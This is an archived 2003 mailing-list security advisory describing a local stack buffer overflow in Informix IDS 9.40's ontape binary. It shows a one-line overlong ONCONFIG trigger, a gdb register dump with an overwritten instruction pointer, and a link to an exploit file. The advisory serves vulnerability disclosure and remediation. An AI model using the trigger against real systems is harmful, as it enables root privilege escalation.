[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.44.0401270957190.5359-100000@hades2.concha.upv.es>
From: pask at open3s.com (pask@...n3s.com)
Subject: OPEN3S-2003-08-08-eng-informix-ontape
----------========== OPEN3S-2003-08-08-eng-informix-ontape ==========----------
Title: Local Vulnerability at Informix IDSv9.40 via ontape binary
Date: 08-08-2003
Platform: Only tested in Linux but can be exported to others.
Impact: Any user with DSA privileges over Informix could achieve root
privileges through a stack buffer overflow in ontape binary
Author: Juan Manuel Pascual Escriba pask@...n3s.com
Status: Solved by IBM Corp.
PROBLEM SUMMARY:
Stack Buffer overflow exists in ONCONFIG environment variable read
process when it's bigger than 495 bytes.
[informix@...oni bin]$ export ONCONFIG=`perl -e 'print "A"x495'`
[informix@...oni bin]$ ./ontape
WARNING: Cannot access configuration file $INFORMIXDIR/etc/$ONCONFIG.
Segmentation fault
[pask@...oniet bin]$ gdb ./ontape
(gdb) r
WARNING: Cannot access configuration file $INFORMIXDIR/etc/$ONCONFIG.
Segmentation fault
(gdb) info reg
eax 0xffffffff -1
ecx 0x40083580 1074279808
edx 0x46 70
ebx 0x1 1
esp 0xbfff74a0 0xbfff74a0
ebp 0x41414141 0x41414141
esi 0xbfff74cc -1073777460
edi 0x0 0
eip 0x41414141 0x41414141
It's posible to achieve root privileges through this buffer overflow.
IMPACT:
Any user with exec permision over ontape could achieve root
privileges. In my default installation only users with DSA privileges
can exec this binary.
SOLUTION:
See more infomartion about this vulnerability and workaround at:
http://www-1.ibm.com/support/docview.wss?uid=swg21153336
STATUS
Reported to IBM security team at 11th of August 2003
See more infomartion about this vulnerability and workaround at:
http://www-1.ibm.com/support/docview.wss?uid=swg21153336
This vulnerability was managed in an efficient manner by Jonathan Leffler
from IBM Informix Database Engineering Team.
EXPLOIT
http://www.open3s.com/exploits/OPEN3S-2003-08-08-eng-informix-ontape.c
--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba pask@...n3s.com
Barcelona - Spain http://www.open3s.com
--
Powered by blists - more mailing lists